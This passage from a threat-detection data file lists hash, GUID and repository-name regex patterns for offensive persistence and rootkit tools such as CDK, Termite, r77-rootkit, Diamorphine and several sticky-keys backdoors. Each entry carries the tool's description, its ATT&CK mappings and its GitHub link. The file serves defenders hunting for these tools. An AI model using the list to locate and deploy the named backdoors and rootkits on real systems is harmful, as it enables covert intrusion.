678*3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20*.{0,1000}3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24904
679*3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b*.{0,1000}3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z24930
680*3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d*.{0,1000}3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10#filehashN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z24956
681*3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45*.{0,1000}3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10#filehashN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z24986
682*3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012*.{0,1000}3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features10#filehashN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z25024
683*3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3*.{0,1000}3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z25048
684*3D9D679D-6052-4C5E-BD91-2BC3DED09D0A*.{0,1000}3D9D679D\-6052\-4C5E\-BD91\-2BC3DED09D0A.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10#GUIDprojectN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z25106
685*3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0*.{0,1000}3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z25118
686*3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a*.{0,1000}3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z25135
687*3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647*.{0,1000}3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z25262
688*3gstudent/COM-Object-hijacking*.{0,1000}3gstudent\/COM\-Object\-hijacking.{0,1000}offensive_tool_keywordCOM-Object-hijackinguse COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)T1546.015TA0003N/AN/APersistencehttps://github.com/3gstudent/COM-Object-hijacking11N/AN/A8158302017-08-04T09:19:40Z2017-08-04T08:15:36Z25277
689*3gstudent/Office-Persistence*.{0,1000}3gstudent\/Office\-Persistence.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence11N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z25280
690*3gstudent/Waitfor-Persistence*.{0,1000}3gstudent\/Waitfor\-Persistence.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence11N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z25282
691*42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302*.{0,1000}42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z25525
692*42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208*.{0,1000}42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10#filehashN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z25527
693*436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438*.{0,1000}436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438.{0,1000}offensive_tool_keywordPspersistDropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001TA0003N/AN/APersistencehttps://github.com/TheD1rkMtr/Pspersist10#filehashN/A10185242023-08-02T02:27:29Z2023-02-01T17:21:38Z25561
694*44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0*.{0,1000}44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z25627
695*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*.{0,1000}443D8CBF\-899C\-4C22\-B4F6\-B7AC202D4E37.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide10#GUIDprojectN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z25630
696*46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd*.{0,1000}46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z25807
697*486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8*.{0,1000}486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8.{0,1000}offensive_tool_keywordOffensive-Netsh-HelperMaintain Windows Persistence with an evil Netshell Helper DLLT1174 - T1055.011 - T1546.013 - T1574.002 - T1105TA0003 N/AN/APersistencehttps://github.com/rtcrowley/Offensive-Netsh-Helper10#filehashN/A911252018-07-28T02:12:09Z2018-07-25T22:49:20Z25924
698*4889b9e1fa6c34ea86e56253135093b390919aa006f8cd3fa372b410f2f1e5bf*.{0,1000}4889b9e1fa6c34ea86e56253135093b390919aa006f8cd3fa372b410f2f1e5bf.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10#filehashN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z25934
699*48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576*.{0,1000}48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z25950
700*4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef*.{0,1000}4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26026
701*4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f*.{0,1000}4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26166
702*4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314*.{0,1000}4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26178
703*4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c*.{0,1000}4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10#filehashN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z26186
704*4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6*.{0,1000}4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26216
705*4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de*.{0,1000}4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26225
706*4D71336E-6EF6-4DF1-8457-B94DC3D73FE7*.{0,1000}4D71336E\-6EF6\-4DF1\-8457\-B94DC3D73FE7.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z26297
707*4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79*.{0,1000}4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26323
708*4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6*.{0,1000}4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26384
709*4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605*.{0,1000}4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26406
710*4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f*.{0,1000}4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26427
711*504764d19a025b282b230491d91abbc551f1b9887ee669bbb7211b6dd86b1038*.{0,1000}504764d19a025b282b230491d91abbc551f1b9887ee669bbb7211b6dd86b1038.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z26494
712*51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379*.{0,1000}51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26549
713*54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56*.{0,1000}54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26839
714*56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a*.{0,1000}56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z26974
715*56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821*.{0,1000}56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z27007
716*575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff*.{0,1000}575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27036
717*5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437*.{0,1000}5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27050
718*578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577*.{0,1000}578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10#filehashN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z27056
719*580ba177-cf9a-458c-a692-36dd6f23ea77*.{0,1000}580ba177\-cf9a\-458c\-a692\-36dd6f23ea77.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#GUIDprojectN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z27088
720*58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee*.{0,1000}58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee.{0,1000}offensive_tool_keywordPspersistDropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001TA0003N/AN/APersistencehttps://github.com/TheD1rkMtr/Pspersist10#filehashN/A10185242023-08-02T02:27:29Z2023-02-01T17:21:38Z27104
721*5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d*.{0,1000}5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27117
722*588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a*.{0,1000}588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27127
723*58B32FCA-F385-4500-9A8E-7CBA1FC9BA13*.{0,1000}58B32FCA\-F385\-4500\-9A8E\-7CBA1FC9BA13.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10#GUIDprojectN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z27146
724*58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983*.{0,1000}58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27157
725*58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d*.{0,1000}58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27160
726*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*.{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z27164
727*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*.{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z27165
728*594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea*.{0,1000}594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27182
729*59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1*.{0,1000}59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10#filehashN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z27202
730*5A403F3C-9136-4B67-A94E-02D3BCD3162D*.{0,1000}5A403F3C\-9136\-4B67\-A94E\-02D3BCD3162D.{0,1000}offensive_tool_keywordPspersistDropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001TA0003N/AN/APersistencehttps://github.com/TheD1rkMtr/Pspersist10#GUIDprojectN/A10185242023-08-02T02:27:29Z2023-02-01T17:21:38Z27240
731*5a958c89-6327-401c-a214-c89e54855b57*.{0,1000}5a958c89\-6327\-401c\-a214\-c89e54855b57.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#GUIDprojectN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z27262
732*5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695*.{0,1000}5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27308
733*5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181*.{0,1000}5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z27370
734*5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4*.{0,1000}5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27498
735*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*.{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#filehash #linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z27502
736*5f4e2217fe4e88c926dbe4d002e5bfaa47591a6e53b93df88596a654aaeae78d*.{0,1000}5f4e2217fe4e88c926dbe4d002e5bfaa47591a6e53b93df88596a654aaeae78d.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z27630
737*5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa*.{0,1000}5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27634
